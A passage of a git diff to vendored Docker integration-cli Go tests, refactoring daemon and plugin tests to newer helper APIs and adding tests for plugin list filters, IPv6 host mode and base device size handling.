@@ -115,16 +98,12 @@ func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start("--live-restore"); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c, "--live-restore") if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } defer func() { - if err := s.d.Restart("--live-restore"); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c, "--live-restore") if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) } @@ -133,31 +112,24 @@ func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) } }() - if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + if err := s.d.Interrupt(); err != nil { c.Fatalf("Could not kill daemon: %v", err) } - cmd := exec.Command("pgrep", "-f", pluginProcessName) - if out, ec, err := runCommandWithOutput(cmd); ec != 0 { - c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) - } + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) } // TestDaemonShutdownWithPlugins shuts down running plugins. 
func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) { testRequires(c, IsAmd64, Network, SameHostDaemon) - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } defer func() { - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) } @@ -166,25 +138,50 @@ func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) { } }() - if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + if err := s.d.Interrupt(); err != nil { c.Fatalf("Could not kill daemon: %v", err) } for { - if err := syscall.Kill(s.d.cmd.Process.Pid, 0); err == syscall.ESRCH { + if err := unix.Kill(s.d.Pid(), 0); err == unix.ESRCH { break } } - cmd := exec.Command("pgrep", "-f", pluginProcessName) - if out, ec, err := runCommandWithOutput(cmd); ec != 1 { - c.Fatalf("Expected exit code '1', got %d err: %v output: %s ", ec, err, out) + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + }) + + s.d.Start(c) + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) +} + +// TestDaemonKillWithPlugins leaves plugins running. 
+func (s *DockerDaemonSuite) TestDaemonKillWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network, SameHostDaemon) + + s.d.Start(c) + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) } - s.d.Start("--live-restore") - cmd = exec.Command("pgrep", "-f", pluginProcessName) - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) + defer func() { + s.d.Restart(c) + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Kill(); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + // assert that plugins are running. + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) } // TestVolumePlugin tests volume creation using a plugin. 
@@ -195,19 +192,11 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { destDir := "/tmp/data/" destFile := "foo" - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) out, err := s.d.Cmd("plugin", "install", pName, "--grant-all-permissions") if err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } - pluginID, err := s.d.Cmd("plugin", "inspect", "-f", "{{.Id}}", pName) - pluginID = strings.TrimSpace(pluginID) - if err != nil { - c.Fatalf("Could not retrieve plugin ID: %v %s", err, pluginID) - } - mountpointPrefix := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs") defer func() { if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) @@ -216,11 +205,6 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { c.Fatalf("Could not remove plugin: %v %s", err, out) } - - exists, err := existsMountpointWithPrefix(mountpointPrefix) - c.Assert(err, checker.IsNil) - c.Assert(exists, checker.Equals, false) - }() out, err = s.d.Cmd("volume", "create", "-d", pName, volName) @@ -240,45 +224,17 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { c.Assert(out, checker.Contains, volName) c.Assert(out, checker.Contains, pName) - mountPoint, err := s.d.Cmd("volume", "inspect", volName, "--format", "{{.Mountpoint}}") - if err != nil { - c.Fatalf("Could not inspect volume: %v %s", err, mountPoint) - } - mountPoint = strings.TrimSpace(mountPoint) - out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "touch", destDir+destFile) c.Assert(err, checker.IsNil, check.Commentf(out)) - path := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs", mountPoint, destFile) - _, err = os.Lstat(path) - c.Assert(err, checker.IsNil) - exists, err := existsMountpointWithPrefix(mountpointPrefix) - c.Assert(err, checker.IsNil) - c.Assert(exists, 
checker.Equals, true) -} - -func (s *DockerDaemonSuite) TestGraphdriverPlugin(c *check.C) { - testRequires(c, Network, IsAmd64, DaemonIsLinux, overlay2Supported, ExperimentalDaemon) - - s.d.Start() - - // install the plugin - plugin := "cpuguy83/docker-overlay2-graphdriver-plugin" - out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", plugin) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - // restart the daemon with the plugin set as the storage driver - s.d.Restart("-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1") - - // run a container - out, err = s.d.Cmd("run", "--rm", "busybox", "true") // this will pull busybox using the plugin + out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "ls", destDir+destFile) c.Assert(err, checker.IsNil, check.Commentf(out)) } func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { testRequires(c, DaemonIsLinux, Network, IsAmd64) - s.d.Start("--live-restore=true") + s.d.Start(c, "--live-restore=true") out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName) c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -287,7 +243,7 @@ func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { out, err = s.d.Cmd("volume", "create", "--driver", pName, "test") c.Assert(err, checker.IsNil, check.Commentf(out)) - s.d.Restart("--live-restore=true") + s.d.Restart(c, "--live-restore=true") out, err = s.d.Cmd("plugin", "disable", pName) c.Assert(err, checker.NotNil, check.Commentf(out)) @@ -304,7 +260,7 @@ func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { } func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) { - mounts, err := mount.GetMounts() + mounts, err := mount.GetMounts(nil) if err != nil { return false, err } @@ -315,3 +271,58 @@ func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) { } return false, nil } + +func (s *DockerDaemonSuite) TestPluginListFilterEnabled(c 
*check.C) { + testRequires(c, IsAmd64, Network) + + s.d.Start(c) + + out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pNameWithTag, "--disable") + c.Assert(err, check.IsNil, check.Commentf(out)) + + defer func() { + if out, err := s.d.Cmd("plugin", "remove", pNameWithTag); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + out, err = s.d.Cmd("plugin", "ls", "--filter", "enabled=true") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), pName) + + out, err = s.d.Cmd("plugin", "ls", "--filter", "enabled=false") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, "false") + + out, err = s.d.Cmd("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) +} + +func (s *DockerDaemonSuite) TestPluginListFilterCapability(c *check.C) { + testRequires(c, IsAmd64, Network) + + s.d.Start(c) + + out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pNameWithTag, "--disable") + c.Assert(err, check.IsNil, check.Commentf(out)) + + defer func() { + if out, err := s.d.Cmd("plugin", "remove", pNameWithTag); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + out, err = s.d.Cmd("plugin", "ls", "--filter", "capability=volumedriver") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + + out, err = s.d.Cmd("plugin", "ls", "--filter", "capability=authz") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), pName) + + out, err = s.d.Cmd("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go index 3a74fe215f..d2ff9606e5 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go @@ -5,6 +5,9 @@ package main import ( "bufio" "bytes" + "context" + "crypto/tls" + "crypto/x509" "encoding/json" "fmt" "io" @@ -18,18 +21,27 @@ import ( "strconv" "strings" "sync" - "syscall" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/cloudflare/cfssl/helpers" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + moby_daemon "github.com/docker/docker/daemon" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/pkg/stringid" "github.com/docker/go-units" "github.com/docker/libnetwork/iptables" "github.com/docker/libtrust" "github.com/go-check/check" "github.com/kr/pty" + "golang.org/x/sys/unix" + "gotest.tools/icmd" ) // TestLegacyDaemonCommand test starting docker daemon using "deprecated" docker daemon @@ -37,31 +49,29 @@ import ( func (s *DockerDaemonSuite) TestLegacyDaemonCommand(c *check.C) { cmd := exec.Command(dockerBinary, "daemon", "--storage-driver=vfs", "--debug") err := cmd.Start() + go cmd.Wait() c.Assert(err, checker.IsNil, check.Commentf("could not start daemon using 'docker daemon'")) c.Assert(cmd.Process.Kill(), checker.IsNil) } func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) - if out, err := s.d.Cmd("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"); err != nil { - c.Fatalf("Could not run top1: err=%v\n%s", 
err, out) - } - // --restart=no by default - if out, err := s.d.Cmd("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"); err != nil { - c.Fatalf("Could not run top2: err=%v\n%s", err, out) - } + cli.Docker( + cli.Args("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"), + cli.Daemon(s.d), + ).Assert(c, icmd.Success) + + cli.Docker( + cli.Args("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"), + cli.Daemon(s.d), + ).Assert(c, icmd.Success) testRun := func(m map[string]bool, prefix string) { var format string for cont, shouldRun := range m { - out, err := s.d.Cmd("ps") - if err != nil { - c.Fatalf("Could not run ps: err=%v\n%q", err, out) - } + out := cli.Docker(cli.Args("ps"), cli.Daemon(s.d)).Assert(c, icmd.Success).Combined() if shouldRun { format = "%scontainer %q is not running" } else { @@ -75,27 +85,21 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check testRun(map[string]bool{"top1": true, "top2": true}, "") - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ") } func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "--name", "volrestarttest1", "-v", "/foo", "busybox"); err != nil { c.Fatal(err, out) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) - if _, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil { - c.Fatal(err) + if out, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil { + c.Fatal(err, out) } if out, err := s.d.Cmd("rm", "-fv", "volrestarttest2"); err != nil { @@ -112,8 +116,7 @@ func (s 
*DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) { // #11008 func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name", "top1", "--restart", "always", "busybox:latest", "top") c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out)) @@ -147,8 +150,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { // both stopped testRun(map[string]bool{"top1": false, "top2": false}, "") - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) // restart=always running testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ") @@ -156,8 +158,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { out, err = s.d.Cmd("start", "top2") c.Assert(err, check.IsNil, check.Commentf("start top2: %v", out)) - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) // both running testRun(map[string]bool{"top1": true, "top2": true}, "After second daemon restart: ") @@ -165,14 +166,13 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name", "test1", "--restart", "on-failure:3", "busybox:latest", "false") c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out)) // wait test1 to stop - hostArgs := []string{"--host", s.d.sock()} + hostArgs := []string{"--host", s.d.Sock()} err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 10*time.Second, hostArgs...) 
c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not")) @@ -181,8 +181,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) lastStartTime := out - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) // test1 shouldn't restart at all err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 0, hostArgs...) @@ -196,32 +195,35 @@ func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonStartIptablesFalse(c *check.C) { - if err := s.d.Start("--iptables=false"); err != nil { - c.Fatalf("we should have been able to start the daemon with passing iptables=false: %v", err) - } + s.d.Start(c, "--iptables=false") } // Make sure we cannot shrink base device at daemon restart. func (s *DockerDaemonSuite) TestDaemonRestartWithInvalidBasesize(c *check.C) { testRequires(c, Devicemapper) - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) - oldBasesizeBytes := s.d.getBaseDeviceSize(c) + oldBasesizeBytes := getBaseDeviceSize(c, s.d) var newBasesizeBytes int64 = 1073741824 //1GB in bytes if newBasesizeBytes < oldBasesizeBytes { - err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) - c.Assert(err, check.IsNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err)) + err := s.d.RestartWithError("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + c.Assert(err, check.NotNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err)) + // 'err != nil' is expected behaviour, no new daemon started, + // so no need to stop daemon. + if err != nil { + return + } } - c.Assert(s.d.Stop(), check.IsNil) + s.d.Stop(c) } // Make sure we can grow base device at daemon restart. 
func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) { testRequires(c, Devicemapper) - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) - oldBasesizeBytes := s.d.getBaseDeviceSize(c) + oldBasesizeBytes := getBaseDeviceSize(c, s.d) var newBasesizeBytes int64 = 53687091200 //50GB in bytes @@ -229,14 +231,42 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) { c.Skip(fmt.Sprintf("New base device size (%v) must be greater than (%s)", units.HumanSize(float64(newBasesizeBytes)), units.HumanSize(float64(oldBasesizeBytes)))) } - err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + err := s.d.RestartWithError("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) c.Assert(err, check.IsNil, check.Commentf("we should have been able to start the daemon with increased base device size: %v", err)) - basesizeAfterRestart := s.d.getBaseDeviceSize(c) + basesizeAfterRestart := getBaseDeviceSize(c, s.d) newBasesize, err := convertBasesize(newBasesizeBytes) c.Assert(err, check.IsNil, check.Commentf("Error in converting base device size: %v", err)) c.Assert(newBasesize, check.Equals, basesizeAfterRestart, check.Commentf("Basesize passed is not equal to Basesize set")) - c.Assert(s.d.Stop(), check.IsNil) + s.d.Stop(c) +} + +func getBaseDeviceSize(c *check.C, d *daemon.Daemon) int64 { + info := d.Info(c) + for _, statusLine := range info.DriverStatus { + key, value := statusLine[0], statusLine[1] + if key == "Base Device Size" { + return parseDeviceSize(c, value) + } + } + c.Fatal("failed to parse Base Device Size from info") + return int64(0) +} + +func parseDeviceSize(c *check.C, raw string) int64 { + size, err := units.RAMInBytes(strings.TrimSpace(raw)) + c.Assert(err, check.IsNil) + return size +} + +func convertBasesize(basesizeBytes int64) (int64, error) { + basesize := units.HumanSize(float64(basesizeBytes)) + basesize = strings.Trim(basesize, " ")[:len(basesize)-3] + 
basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) + if err != nil { + return 0, err + } + return int64(basesizeFloat) * 1024 * 1024 * 1024, nil } // Issue #8444: If docker0 bridge is modified (intentionally or unintentionally) and @@ -246,67 +276,38 @@ func (s *DockerDaemonSuite) TestDaemonStartBridgeWithoutIPAssociation(c *check.C // rather than depending on brctl commands to verify docker0 is created and up // let's start the daemon and stop it, and then make a modification to run the // actual test - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Start(c) + s.d.Stop(c) // now we will remove the ip from docker0 and then try starting the daemon - ipCmd := exec.Command("ip", "addr", "flush", "dev", "docker0") - stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) - if err != nil { - c.Fatalf("failed to remove docker0 IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) - } + icmd.RunCommand("ip", "addr", "flush", "dev", "docker0").Assert(c, icmd.Success) - if err := s.d.Start(); err != nil { + if err := s.d.StartWithError(); err != nil { warning := "**WARNING: Docker bridge network in bad state--delete docker0 bridge interface to fix" c.Fatalf("Could not start daemon when docker0 has no IP address: %v\n%s", err, warning) } } func (s *DockerDaemonSuite) TestDaemonIptablesClean(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil { c.Fatalf("Could not run top: %s, %v", out, err) } - // get output from iptables with container running ipTablesSearchString := "tcp dpt:80" - ipTablesCmd := exec.Command("iptables", "-nvL") - out, _, err := runCommandWithOutput(ipTablesCmd) - if err != nil { - 
c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) - } + // get output from iptables with container running + verifyIPTablesContains(c, ipTablesSearchString) - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Stop(c) // get output from iptables after restart - ipTablesCmd = exec.Command("iptables", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - - if strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, out) - } + verifyIPTablesDoesNotContains(c, ipTablesSearchString) } func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "-d", "--name", "top", "--restart=always", "-p", "80", "busybox:latest", "top"); err != nil { c.Fatalf("Could not run top: %s, %v", out, err) @@ -314,38 +315,36 @@ func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) { // get output from iptables with container running ipTablesSearchString := "tcp dpt:80" - ipTablesCmd := exec.Command("iptables", "-nvL") - out, _, err := runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) - } + verifyIPTablesContains(c, ipTablesSearchString) - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) // make sure the container is not running runningOut, err := s.d.Cmd("inspect", 
"--format={{.State.Running}}", "top") if err != nil { - c.Fatalf("Could not inspect on container: %s, %v", out, err) + c.Fatalf("Could not inspect on container: %s, %v", runningOut, err) } if strings.TrimSpace(runningOut) != "true" { c.Fatalf("Container should have been restarted after daemon restart. Status running should have been true but was: %q", strings.TrimSpace(runningOut)) } // get output from iptables after restart - ipTablesCmd = exec.Command("iptables", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) + verifyIPTablesContains(c, ipTablesSearchString) +} + +func verifyIPTablesContains(c *check.C, ipTablesSearchString string) { + result := icmd.RunCommand("iptables", "-nvL") + result.Assert(c, icmd.Success) + if !strings.Contains(result.Combined(), ipTablesSearchString) { + c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, result.Combined()) } +} - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output after restart should have contained %q, but was %q", ipTablesSearchString, out) +func verifyIPTablesDoesNotContains(c *check.C, ipTablesSearchString string) { + result := icmd.RunCommand("iptables", "-nvL") + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), ipTablesSearchString) { + c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, result.Combined()) } } @@ -357,9 +356,7 @@ func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) { setupV6(c) defer teardownV6(c) - if err := s.d.StartWithBusybox("--ipv6"); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c, "--ipv6") iface, err := net.InterfaceByName("docker0") if err != nil { @@ -417,11 +414,11 @@ func (s *DockerDaemonSuite) TestDaemonIPv6Enabled(c *check.C) { func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) { // IPv6 setup is messing with local bridge address. 
testRequires(c, SameHostDaemon) - setupV6(c) - defer teardownV6(c) + // Delete the docker0 bridge if its left around from previous daemon. It has to be recreated with + // ipv6 enabled + deleteInterface(c, "docker0") - err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100") - c.Assert(err, checker.IsNil, check.Commentf("Could not start daemon with busybox: %v", err)) + s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:2::/64", "--default-gateway-v6=2001:db8:2::100") out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "busybox:latest") c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err)) @@ -445,11 +442,11 @@ func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDR(c *check.C) { func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) { // IPv6 setup is messing with local bridge address. testRequires(c, SameHostDaemon) - setupV6(c) - defer teardownV6(c) + // Delete the docker0 bridge if its left around from previous daemon. 
It has to be recreated with + // ipv6 enabled + deleteInterface(c, "docker0") - err := s.d.StartWithBusybox("--ipv6", "--fixed-cidr-v6=2001:db8:1::/64") - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:1::/64") out, err := s.d.Cmd("run", "-itd", "--name=ipv6test", "--mac-address", "AA:BB:CC:DD:EE:FF", "busybox") c.Assert(err, checker.IsNil) @@ -459,15 +456,29 @@ func (s *DockerDaemonSuite) TestDaemonIPv6FixedCIDRAndMac(c *check.C) { c.Assert(strings.Trim(out, " \r\n'"), checker.Equals, "2001:db8:1::aabb:ccdd:eeff") } +// TestDaemonIPv6HostMode checks that when the running a container with +// network=host the host ipv6 addresses are not removed +func (s *DockerDaemonSuite) TestDaemonIPv6HostMode(c *check.C) { + testRequires(c, SameHostDaemon) + deleteInterface(c, "docker0") + + s.d.StartWithBusybox(c, "--ipv6", "--fixed-cidr-v6=2001:db8:2::/64") + out, err := s.d.Cmd("run", "-itd", "--name=hostcnt", "--network=host", "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf("Could not run container: %s, %v", out, err)) + + out, err = s.d.Cmd("exec", "hostcnt", "ip", "-6", "addr", "show", "docker0") + c.Assert(err, checker.IsNil) + c.Assert(strings.Trim(out, " \r\n'"), checker.Contains, "2001:db8:2::1") +} + func (s *DockerDaemonSuite) TestDaemonLogLevelWrong(c *check.C) { - c.Assert(s.d.Start("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level")) + c.Assert(s.d.StartWithError("--log-level=bogus"), check.NotNil, check.Commentf("Daemon shouldn't start with wrong log level")) } func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) { - if err := s.d.Start("--log-level=debug"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--log-level=debug") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Missing level="debug" in log file:\n%s`, 
string(content)) } @@ -475,40 +486,36 @@ func (s *DockerDaemonSuite) TestDaemonLogLevelDebug(c *check.C) { func (s *DockerDaemonSuite) TestDaemonLogLevelFatal(c *check.C) { // we creating new daemons to create new logFile - if err := s.d.Start("--log-level=fatal"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--log-level=fatal") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should not have level="debug" in log file:\n%s`, string(content)) } } func (s *DockerDaemonSuite) TestDaemonFlagD(c *check.C) { - if err := s.d.Start("-D"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "-D") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should have level="debug" in log file using -D:\n%s`, string(content)) } } func (s *DockerDaemonSuite) TestDaemonFlagDebug(c *check.C) { - if err := s.d.Start("--debug"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--debug") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should have level="debug" in log file using --debug:\n%s`, string(content)) } } func (s *DockerDaemonSuite) TestDaemonFlagDebugLogLevelFatal(c *check.C) { - if err := s.d.Start("--debug", "--log-level=fatal"); err != nil { - c.Fatal(err) - } - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + s.d.Start(c, "--debug", "--log-level=fatal") + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) if !strings.Contains(string(content), `level=debug`) { c.Fatalf(`Should have level="debug" in log file when using both --debug and --log-level=fatal:\n%s`, string(content)) } @@ -526,9 +533,7 @@ func (s *DockerDaemonSuite) TestDaemonAllocatesListeningPort(c *check.C) 
